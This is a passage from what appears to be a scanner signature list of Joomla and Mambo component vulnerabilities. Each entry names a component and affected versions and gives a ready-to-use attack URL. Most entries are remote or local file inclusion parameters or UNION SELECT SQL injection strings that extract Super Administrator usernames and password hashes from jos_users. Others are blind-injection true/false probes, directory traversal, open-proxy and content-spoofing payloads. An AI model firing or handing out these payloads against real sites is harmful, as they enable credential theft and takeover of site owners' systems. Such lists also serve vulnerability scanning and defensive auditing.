ents/com_treeg/admin.treeg.php?mosConfig_live_site= Component: VirtueMart Google Base Component (com_googlebase) Remote File Inclusi on Vulnerability Version Affected: 1.1<= |/components/com_googlebase/|/component s/com_googlebase/admin.googlebase.php?mosConfig_absolute_path= Component: com_ongumatimesheet20 Beta Remote File Inclusion Vulnerability Ver sion Affected: 4<= |/components/com_ongumatimesheet20/|/components/com_ongumat imesheet20/lib/onguma.class.php?mosConfig_absolute_path= Component: ProDesk (com_pro_desk) Local File Inclusion Vulnerability Version Affected: 1.2<= |/components/com_pro_desk/|/index.php?option=com_pro_desk&in clude_file= Component: Clickheat - Heatmap stats for Joomla! Multiple Remote File Inclusion Vulnerabilities Version Affected: 1.0.1<= |/components/com_clickheat/|/com

    ponents/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolut e_path]= Component: Dada Mail Manager Component Remote File Inclusion Vulnerability Ver sion Affected: 2.6 <= |/components/com_dadamail/|/components/com_dadamail/conf ig.dadamail.php?GLOBALS[mosConfig_absolute_path]= Component: Recly!Competitions Component Multiple Remote File Inclusion Vulnerabi lity Version Affected: 1.0.0 <= |/components/com_competitions/|/components/ com_competitions/includes/settings/settings.php?mosConfig_absolute_path= Component: People Book File Inclusion Vulnerability Versions effected: 1.1.5 and older|/administrator/components/com_peoplebook/param.peoplebook.php|/admini strator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= Component: Feederator - RSS manager Component Multiple Remote File Inclusion Vu lnerabilities Version Affected: 1.0.5 <= |/components/com_recly/|/components /com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode] /components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_abso lute_path=[evilcode] /components/com_feederator/includes/tmsp/s ubscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode] /components/c om_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path= Component: Joomla com_books(book_id) SQL Injection Vulnerability Version Affe cted: <= |/components/com_books/|/index.php?option=com_books&task=book_details &book_id=-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+ where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_catalogproduction (id) SQL Injection Vulnerability Version Aff ected: N/A |/components/com_catalogproduction/|/index.php?option=com_catalogp roduction&task=viewdetail&id=-9999+union+all+select+1,2,concat(username,char(58) ,password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users+wh ere+usertype=0x53757065722041646d696e6973747261746f72-Component: Simple RSS Reader Component Remote File Inclusion Vulnerability V ersion Affected: 1.0 <= |/components/com_rssreader/|/components/com_rssreader/ admin.rssreader.php?mosConfig_live_site= Component: Hot Property Version Affected: 0.97<= |/components/com_hotproper ties/|N/A Component: com_contactinfo(catid) SQL Injection Vulnerability Version Affected: N/A|/components/com_contactinfo/|/index.php?option=com_contactinfo&catid=-999 9/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11, 12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e69737472617 46f72--/* Component: A6MamboCredits File Inclusion Vulnerability Versions effected: Any |/administrator/components/com_a6mambocredits/|/administrator/components/com_a6m ambocredits/admin.a6mambocredits.php?mosConfig_absolute_path= Component: A6MamboHelpDesk File Inclusion Vulnerability Versions effected: A ny Version|/administrator/components/com_a6mambohelpdesk/|/administrator/compone nts/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site= Component: Colophon File Inclusion Vulnerability Versions effected: 1.2 and older|/administrator/components/com_colophon/|/administrator/components/com_colo phon/admin.colophon.php?mosConfig_absolute_path= Component: Community Builder Component File Inclusion Vulnerability Versions Aff ected: 1.0<= |/administrator/components/com_comprofiler/plugin.class.php|/admini strator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= Component: MambelFish RFI Vulnerability Versions effected: 1.x and older|/admi nistrator/components/com_mambelfish/|/administrator/components/com_mambelfish/ma mbelfish.class.php?mosConfig_absolute_path= Component: Com Profiler Blind SQL Injection Vulnerability Versions effected: 1.0 RC2 and older|/administrator/components/com_comprofiler/|/index.php?option= com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofil er&task=userProfile&user=1+and+1=2 Component: User Home Pages 2 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/administrator/components/com_uhp2/|/administrator/components/co m_uhp2/uhp_config.php?mosConfig_absolute_path=

    Component: User Home Pages 1 File Inclusion Vulnerability Versions effecte d: 1.1.1 and older|/administrator/components/com_uhp/|/administrator/components/ com_uhp/uhp_config.php?mosConfig_absolute_path= Component: Bayesian Naive Filter File Inclusion Vulnerability Versions e ffected: 1.1 and older|/administrator/components/com_bayesiannaivefilter/|/admin istrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path= Component: Webring File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_webring/|/administrator/components/com_webr ing/admin.webring.docs.php?component_dir= Component: JIM File Inclusion Vulnerability Versions effected: 1.0.1 and older| /administrator/components/com_jim/|/administrator/components/com_jim/install.jim .php?mosConfig_absolute_path= Component: Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_mgm/|/administrator/compone nts/com_mgm/help.mgm.php?mosConfig_absolute_path= Component: Link Directory File Inclusion Vulnerability Versions effect ed: Any Version|/administrator/components/com_linkdirectory/|/administrator/comp onents/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= Component: Kochsuite File Inclusion Vulnerability Versions effecte d: 0.9.4 and older|/administrator/components/com_kochsuite /|/administrator/comp onents/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= Component: SWmenu File Inclusion Vulnerability Versions effected: 4.0 and older|/administrator/components/com_swmenupro/|/administrator/components/co m_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path= Component: JoomlaPack File Inclusion Vulnerability Versions effected: 1.0.4a2 RE and older|/administrator/components/com_jpack/|/administrator/compone nts/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path= Component: Joomla Radio 5 File Inclusion Vulnerability Versions effecte d: 5.0 and older|/administrator/components/com_joomlaradiov5/|/administrator/com ponents/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= Component: Joomla Flash Fun! File Inclusion Vulnerability Versions effect ed: 1.0 and older|/administrator/components/com_joomlaflashfun/|/administrator/c omponents/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site= Component: JContentSubscription File Inclusion Vulnerability Versions effec ted: 1.5.8 and older|/administrator/components/com_jcs/|/administrator/component s/com_jcs/jcs.function.php?mosConfig_absolute_path= Component: Joomla Flash Uploader File Inclusion Vulnerability Versions effe cted: 2.5.2 and older|/administrator/components/com_joomla_flash_uploader/|/admi nistrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php ?mosConfig_absolute_path= Component: MosMedia File Inclusion Vulnerability Versions effected: 1.0.8 and older|/administrator/components/com_mosmedia/|/administrator/components/com _mosmedia/media.tab.php?mosConfig_absolute_path= Component: WmT Advanced Flash Gallery File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_wmtgallery/|/administrato r/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site= Component: Webmaster Tips Portfolio File Inclusion Vulnerability Versions e ffected: 1.0 and older|/administrator/components/com_wmtportfolio/|/administrato r/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path= Component: Color Lab File Inclusion Vulnerability Versions effected: 1.0 an d older|/administrator/components/com_colorlab/|/administrator/components/com_co lor/admin.color.php?mosConfig_live_site= Component: Carousel Flash Image Gallery File Inclusion Vulnerability Versi ons effected: 1.0 and older|/administrator/components/com_jjgallery/|/administra tor/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path= Component: eXtplorer Local Directory Traversal Vulnerability Versions Affected: 2.0.0 RC2 <= |/extplorer/|/index.php?com_extplorer-test2 Component: JUser File Inclusion Vulnerability Versions effected: 1.0.14 a nd older|/administrator/components/com_juser/|/administrator/components/com_juse r/xajax_functions.php?mosConfig_absolute_path=

    Component: eXtplorer Local Directory Traversal Vulnerability Versions Affect ed: 2.0.0 RC2 <= |/eXtplorer/|/index.php?com_extplorer-test3 Component: eXtplorer Local Directory Traversal Vulnerability Versions Affect ed: 2.0.0 RC2 <= |/administrator/components/com_extplorer/|/index.php?com_extplo rer-test1 Component: Joomla! 12Pictures File Inclusion Vulnerability Versions effecte d: 1.0 and older|/administrator/components/com_joom12pic/|/administrator/compone nts/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= Component: Flash Panoramic View File Inclusion Vulnerability Versions effe cted: 1.0 and older|/administrator/components/com_panoramic/|/administrator/comp onents/com_panoramic/admin.panoramic.php?mosConfig_live_site= Component: Community Builder Component File Inclusion Vulnerability Versions Aff ected: 1.0<= |/components/com_comprofiler/plugin.class.php|/components/com_compr ofiler/plugin.class.php?mosConfig_absolute_path= Component: com_djiceshoutbox Persistent XSS Vulnerability Versions Affected: 1 .0|/components/com_djiceshoutbox/|/index.php?option=com_djiceshoutbox&view=ajax& format=djiceshoutbox Component: com_flyspray File Inclusion Vulnerability Versions Affected: N /A|/components/com_flyspray/startdown.php|/components/com_flyspray/startdown.php ?file= Component: ExtCalendar File Inclusion Vulnerability Versions effected: 0.9.1 and older|/components/com_extcalendar/extcalendar.php|/components/com_extcalend ar/extcalendar.php?mosConfig_absolute_path= Component: PC CookBook File Inclusion Vulnerability Versions effected: 1.3 a nd older|/components/com_pccookbook/pccookbook.php|/components/com_pccookbook/pc cookbook.php?mosConfig_absolute_path= Component: com_smf File Inclusion Vulnerability Versions Affected: N/A|/c omponents/com_smf/smf.php|/components/com_smf/smf.php?mosConfig_absolute_path= Component: com_loudmounth File Inclusion Vulnerability Versions Affected: N/A|/components/com_loudmounth/includes/abbc/abbc.class.php|/components/com_lou dmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= Component: Multibanners File Inclusion Vulnerability Versions effected: Any Ver sion|/administrator/components/com_multibanners/extadminmenus.class.php|/adminis trator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_pa th= Component: Cmimarketplace (viewit) Directory Traversal Vulnerability Versions Affected: N/A|/components/com_cmimarketplace/|/index.php?option=com_cmimarketpla ce&Itemid=1&viewit=/../../&cid=1 Component: akocomments.php File Inclusion Vulnerability Versions Affected : N/A|/akocomments.php|/akocomments.php?mosConfig_absolute_path= Component: Crop Image File Inclusion Vulnerability Versions effected: 1.0 a nd older|/administrator/components/com_cropimage/admin.cropcanvas.php|/administr ator/components/com_cropimage/admin.cropcanvas.php?cropimagedir= Component: Serverstat File Inclusion Vulnerability Versions effected: 0.4. 4 and older|/administrator/components/com_serverstat/install.serverstat.php|/adm inistrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_p ath= Component: com_ijoomla_archive (catid) Blind SQL Injection Vulnerability Versi ons Affected: N/A|/components/com_ijoomla_archive/|/index.php?option=com_ijoomla _archive&task=archive&search_archive=1&act=search&catid=1+and+1=1::/index.php?op tion=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1= 2 Component: Remository File Inclusion Vulnerability Versions effecte d: 3.25 and older|/administrator/components/com_remository/admin.remository.php| /administrator/components/com_remository/admin.remository.php?mosConfig_absolute _path= Component: Lurm Constructor File Inclusion Vulnerability Versions effecte d: 0.6b and older|/administrator/components/com_lurm_constructor/admin.lurm_cons tructor.php|/administrator/components/com_lurm_constructor/admin.lurm_constructo r.php?lm_absolute_path=

    Component: com_digistore (pid) Blind SQL Injection Vulnerability Versions Affe cted: N/A|/components/com_digistore/|/index.php?option=com_digistore&task=show_p roduct&pid=1+and+1=1::/index.php?option=com_digistore&task=show_product&pid=1+an d+1=2 Component: Php Shop File Inclusion Vulnerability Versions effected: 1.2 RC2b and older|/administrator/components/com_phpshop/toolbar.phpshop.html.php|/a dministrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_ path= Component: com_maianmusic SQL Injection Vulnerability Versions effected: 1.2.1|/ components/com_maianmusic/|/index.php?option=com_maianmusic&section=category&cat egory=-1+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21+from+jos_users+where+usertype=0x53757065722041646d6 96e6973747261746f72--&Itemid=1 Component: Mambo eMail Publisher File Inclusion Vulnerability Versions Affect ed: N/A|/administrator/components/com_mmp/help.mmp.php|/administrator/components /com_mmp/help.mmp.php?mosConfig_absolute_path= Component: BSQ Site Stats File Inclusion Vulnerability Versions effected: N/A |/components/com_bsq_sitestats/external/rssfeed.php|/components/com_bsq_sitestat s/external/rssfeed.php?baseDir= Component: CHRONOContact File Inclusion Vulnerability Versions effected: N/A|/administrator/components/com_chronocontact/excelwriter/PPS/File. php|/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConf ig_absolute_path= Component: com_feederator File Inclusion Vulnerability Versions Affected: N/A|/components/com_feederator/includes/tmsp/add_tmsp.php|/components/com_feeder ator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path= Component: com_feederator File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php|/adminis trator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_p ath= Component: com_bookjoomlas SQL Injection Vulnerability Versions effected: 0.1|/c omponents/com_bookjoomlas/|/index.php?option=com_bookjoomlas&Itemid=1&func=comme nt&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,pass word),11,12,13,14,15,16 FROM jos_users+where+usertype=0x53757065722041646d696e69 73747261746f72-Component: GameQ SQL Injection Vulnerability Version Affected: 4.0<= |/compon ents/com_gameq/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELEC T+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10 ,11,12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746 f72-Component: astatsPRO SQL Injection Vulnerability Versions effected: 1.0.0 and older|/administrator/components/com_astatspro/refer.php|/administrator/comp onents/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,passw ord,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e69 73747261746f72-Component: prayercenter SQL injection Vulnerability Version Affected: N/A|/compo nents/com_prayercenter/|/index.php?option=com_prayercenter&task=view_request&id= -1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e), 1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e697374 7261746f72-Component: pcchess SQL Injection Vulnerability Versions effected: N/A|/ components/com_pcchess/|/index.php?option=com_pcchess&Itemid=61&page=players&use r_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype ,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_garyscookbook SQL Injection Vulnerability Versions Affected: N/A|/components/com_garyscookbook/|/index.php?option=com_garyscookbook&Itemid=2 1&func=detail&id=-666+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0 x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0+FROM+jos_users+where+ usertype=0x53757065722041646d696e6973747261746f72-Component: com_hello_world SQL Injection Vulnerability Versions Affecte

    d: N/A|/components/com_hello_world/|/index.php?option=com_hello_world&Itemid=27& task=show&type=intro&id=-9999999+UNION+SELECT+1,2,concat(0x1e,username,0x3a,pass word,0x1e,0x3a,usertype,0x1e),4+FROM+jos_users+where+usertype=0x5375706572204164 6d696e6973747261746f72-Component: com_cms SQL Injection Vulnerability Versions Affected: N/A| /components/com_cms/|/index.php?option=com_cms&act=viewitems&cat_id=-9999999+UNI ON+SELECT+111,111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),22 2,222,333,333+FROM+jos_users+where+usertype=0x53757065722041646d696e697374726174 6f72-Component: com_most SQL Injection Vulnerability Versions Affected: N/A|/c omponents/com_most/|/index.php?option=com_most&mode=email&secid=-9999999+UNION+S ELECT+0000,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,3333 +FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_idvnews SQL Injection Vulnerability Versions Affected: N/A |/components/com_idvnews/|/index.php?option=com_idvnews&id=-1+UNION+SELECT+0,con cat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,0,0,0,0,0+FROM+jos _users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_joomlavvz SQL Injection Vulnerability Versions Affected: N/ A|/components/com_joomlavvz/|/index.php?option=com_joomlavvz&Itemid=34&func=deta il&id=-9999999+UNION+SELECT+0x3a,0x3a,concat(0x1e,username,0x3a,password,0x1e,0x 3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x5375 7065722041646d696e6973747261746f72-Component: com_referenzen SQL Injection Vulnerability Versions Affected: N/A|/components/com_referenzen/|/index.php?option=com_referenzen&Itemid=7&detail =-9999999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0 x1e),3,4,5,6,7,8,9,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d6 96e6973747261746f72-Component: com_genealogy SQL Injection Vulnerability Versions Affected: N /A|/components/com_genealogy/|/index.php?option=com_genealogy&task=profile&id=-9 999999+UNION+SELECT+0,1,2,3,4,5,6,7,8,concat(0x1e,username,0x3a,password,0x1e,0x 3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e69737472 61746f72-Component: com_listoffreeads SQL Injection Vulnerability Versions Affecte d: N/A|/components/com_listoffreeads/|/index.php?option=com_listoffreeads&AdId=1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FRO M+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_geoboerse SQL Injection Vulnerability Versions Affected: N /A|/components/com_geoboerse/|/index.php?option=com_geoboerse&page=view&catid=-1 +UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+j os_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_ricette SQL Injection Vulnerability Versions Affected: N/A |/components/com_ricette/|/index.php?option=com_ricette&Itemid=1&func=detail&id= -9999999+UNION+SELECT+0,0,111,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat (0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usert ype=0x53757065722041646d696e6973747261746f72-Component: com_team SQL Injection Vulnerability Versions Affected: N/A|/co mponents/com_team/|/index.php?option=com_team&gid=-1+UNION+SELECT+1,2,3,concat(0 x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,username,12,13+ FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_formtool SQL Injection Vulnerability Versions Affected: N/ A|/components/com_formtool/|/index.php?option=com_formtool&task=view&formid=2&ca tid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype, 0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_sg SQL Injection Vulnerability Versions Affected: N/A|/com ponents/com_sg/|/index.php?option=com_sg&Itemid=16&task=order&range=3&category=3 &pid=-9999999+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,user type,0x1e),0,0,0,0,0,0,0,10,11,0,0,14,15,16+FROM+jos_users+where+usertype=0x5375 7065722041646d696e6973747261746f72-Component: faq SQL Injection Vulnerability Versions effected: N/A|/components/c om_faq/|/index.php?option=faq&task=viewallfaq&catid=-9999999+UNION+SELECT+concat

    (0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0+FROM+jos_users+where+u sertype=0x53757065722041646d696e6973747261746f72-Component: com_omnirealestate SQL Injection Vulnerability Versions Affect ed: N/A|/components/com_omnirealestate/|/index.php?option=com_omnirealestate&Ite mid=0&func=showObject&info=contact&objid=-9999+UNION+SELECT+1,concat(0x1e,userna me,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x537570 65722041646d696e6973747261746f72--&results=joomla Component: com_model SQL Injection Vulnerability Versions Affected: N/A|/ components/com_model/|/index.php?option=com_model&Itemid=0&task=pipa&act=2&objid =-9999+UNION+SELECT+username,concat(0x1e,username,0x3a,password,0x1e,0x3a,userty pe,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72Component: com_mezun SQL Injection Vulnerability Versions Affected: N/A|/ components/com_mezun/|/index.php?option=com_mezun&task=edit&hidemainmenu=joomla& id=-9999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,userty pe,0x1e),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a+FROM+jos_users+where+usertype=0 x53757065722041646d696e6973747261746f72-Component: com_ewriting SQL Injection Vulnerability Versions Affected: N/ A|/components/com_ewriting/|/index.php?option=com_ewriting&Itemid=9999&func=SELE CTcat&cat=-1+UNION+ALL+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,u sertype,0x1e),4,5,6,7,8,9,10+FROM+jos_users+where+usertype=0x53757065722041646d6 96e6973747261746f72-Component: com_livechat SQL Injection Vulnerability Versions Affected: N/A |/components/com_livechat/getSavedChatRooms.php|/components/com_livechat/getSave dChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a ,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747 261746f72-Component: com_livechat SQL Injection Vulnerability Versions Affected: N/A |/administrator/components/com_livechat/getSavedChatRooms.php|/administrator/com ponents/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,un hex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x5 3757065722041646d696e6973747261746f72-Component: com_letterman Remote File Inclusion Vulnerability Versions effected: N/A|/components/com_letterman/|/index.php?option=com_letterman&task=view&Itemid =&mosConfig_absolute_path= Component: com_livechat Open Proxy Vulnerability Versions Affected: N/A|/ components/com_livechat/xmlhttp.php|/components/com_livechat/xmlhttp.php?GET$01$ 2$3$4$5$http://www.google.com Component: com_livechat Open Proxy Vulnerability Versions Affected: N/A|/ administrator/components/com_livechat/xmlhttp.php|/administrator/components/com_ livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com Component: com_mydyngallery SQL Injection Vulnerability Versions Affected : N/A|/components/com_mydyngallery/|/index.php?option=com_mydyngallery&directory =zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+j os_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_jmovies SQL Injection Vulnerability Versions Affected: N/A |/components/com_jmovies/|/index.php?option=com_jmovies&Itemid=29&task=detail&id =-1+union+select+1,concat(0x215F,username,0x3a,password,0x215F)+from+jos_users+w here+usertype=0x53757065722041646d696e6973747261746f72-Component: com_tech_article SQL Injection Vulnerability Versions Affected: N /A|/components/com_tech_article/|/index.php?option=com_tech_article&task=item&It emid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from +jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_hbssearch Blind SQL Injection Vulnerability Versions Affected : N/A|/components/com_hbssearch/|/index.php?option=com_hbssearch&task=showhoteld etails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon &start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=1::/index.php?optio n=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&da tedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_t

    ype=1+and+1=2 Component: com_tophotelmodule Blind SQL Injection Vulnerability Versions A ffected: N/A|/components/com_tophotelmodule/|/index.php?option=com_tophotelmodul e&task=showhoteldetails&id=1+and+1=1::/index.php?option=com_tophotelmodule&task= showhoteldetails&id=1+and+1=2 Component: com_volunteer SQL Injection Vulnerability Version Affected: N/A|/ components/com_volunteer/|/index.php?option=com_volunteer&task=jobs&act=jobshow& Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),passw ord),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+userty pe=0x53757065722041646d696e6973747261746f72--&filter=&city_id=&function_id=&limi t=5&pageno=1 Component: com_lowcosthotels (id) Blind SQL Injection Vulnerability Versions Affect: N/A|/components/com_lowcosthotels/|/index.php?option=com_lowcosthotels&t ask=showhoteldetails&id=1+and%201=1::/index.php?option=com_lowcosthotels&task=sh owhoteldetails&id=1+and%201=2 Component: com_allhotels (id) Blind SQL Injection Vulnerability Versions Aff ect: N/A|/components/com_allhotels/|/index.php?option=com_allhotels&task=showhot eldetails&id=1+and%201=1::/index.php?option=com_allhotels&task=showhoteldetails& id=1+and%201=2 Component: com_ice(catid) Blind SQL Injection Vulnerability Versions Affected: N/A |/components/com_ice/|/index.php?option=com_ice&catid=1 and 1=1::/index.php? option=com_ice&catid=1 and 1=2 Component: com_liveticker(tid) Blind SQL Injection Vulnerability Versions Affec ted: N/A|/components/com_liveticker/|/index.php?option=com_liveticker&task=viewt icker&tid=1 and 1=1::/index.php?option=com_liveticker&task=viewticker&tid=1 and 1=2 Component: com_mdigg(category) SQL Injection vulnerability Versions Affected: N/A|/components/com_mdigg/|/index.php?option=com_mdigg&act=story_lists&task=view &category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,passwo rd),6,7,8,9,0,11,12,13/**/from/**/jos_users/* Component: Joomla Module com_5starhotels(id) SQL Vulnerability Versions Affec ted: N/A|/components/com_5starhotels/|/index.php?option=com_5starhotels&task=sho whoteldetails&id=1+union+select+1,concat(username,0x3a,password)+from+jos_users+ where+usertype=0x53757065722041646d696e6973747261746f72-Component: PAX Gallery (gid) Blind SQL Injection Vulnerability Versions effecte d: v 0.1 <= |/components/com_paxgallery/|/index.php?option=com_paxgallery&task=t able&gid=1%20and%201=1::/index.php?option=com_paxgallery&task=table&gid=1%20and% 201=2 Component: com_na_content Blind SQL Injection Vulnerability Versions effected: v 1.0 <= |/components/com_na_content/|/index.php?option=com_na_content&task=view& id=1+and+1=1::/index.php?option=com_na_content&task=view&id=1+and+1=2 Component: com_na_mydocs (errmsg) Content Spoofing Vulnerability Version Affec ted: N/A|/components/com_na_mydocs/|/index.php?option=com_na_mydocs&task=showerr &errmsg=Your%20site%20has%20been%20hacked! Component: com_simple_review SQL injection Vulnerability Versions effected: N/A| /components/com_simple_review/|/index.php?option=com_simple_review&category=4+AN D+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users+where+us ertype=0x53757065722041646d696e6973747261746f72-Component: com_na_newsdescription SQL Injection Vulnerability Versions effected: N/A|/components/com_na_newsdescription/|/index.php?option=com_na_newsdescriptio n&task=show&groupId=17377_19&newsid=85790+AND+1=2+UNION+SELECT+concat(username,0 x3a,password),1,2,3,4,5,6,7+from/**/jos_users+where+usertype=0x53757065722041646 d696e6973747261746f72-Component: com_phocadocumentation SQL Injection Vulnerability Versions effected: N/A|/components/com_phocadocumentation/|/index.php?option=com_phocadocumentatio n&view=section&id=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from /**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_xevidmegahd SQL Injection Vulnerability Versions effected: N/A|/c omponents/com_xevidmegahd/|/index.php?option=com_xevidmegahd&Itemid=99999&func=v iewcategory&catid=1+UNION+SELECT+concat(username,0x3a,password)+from/**/jos_user

    s+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_jashowcase SQL Injection Vulnerability Versions effected: N/A|/co mponents/com_jashowcase/|/index.php?option=com_jashowcase&view=jashowcase&Itemid =109&catid=34+AND+1=2+UNION+SELECT+0,1,concat(username,0x3a,password),3,4,5,6,7, 8,9,10,11,12+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261 746f72-Component: com_newsflash SQL Injection Vulnerability Versions effected: N/A|/com ponents/com_newsflash/|/index.php?option=com_newsflash&catid=0&id=8+and+1=1+unio n+select+1,username,password,4+from+jos_users+where+usertype=0x53757065722041646 d696e6973747261746f72-Component: Portfol (com_portfol) SQL Injection Vulnerability Versions effected: 1,2|/components/com_portfol/|/index.php?option=com_portfol&Itemid=814&task=viewc ategory&vcatid=-96+union+select+concat(username,char(58),password)+from+jos_user s+where+usertype=0x53757065722041646d696e6973747261746f72-Component: com_gigcal variant#1 SQL Injection Vulnerability Versions effected: N/A|/components/com_gigcal/|/index.php?option=com_gigcal&task=details&gigcal_gig s_id=402'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58) ,password),0,11,12+from+jos_users+where+usertype=0x53757065722041646d696e6973747 261746f72/*&Itemid=37 Component: com_gigcal variant#2 SQL Injection Vulnerability Versions effected: N /A|/components/com_gigcal/|/index.php?option=com_gigcal&Itemid=78&id=-999+union+ all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25+from+jos_users+where+usertype=0x53757065722041646d6 96e6973747261746f72/* Component: 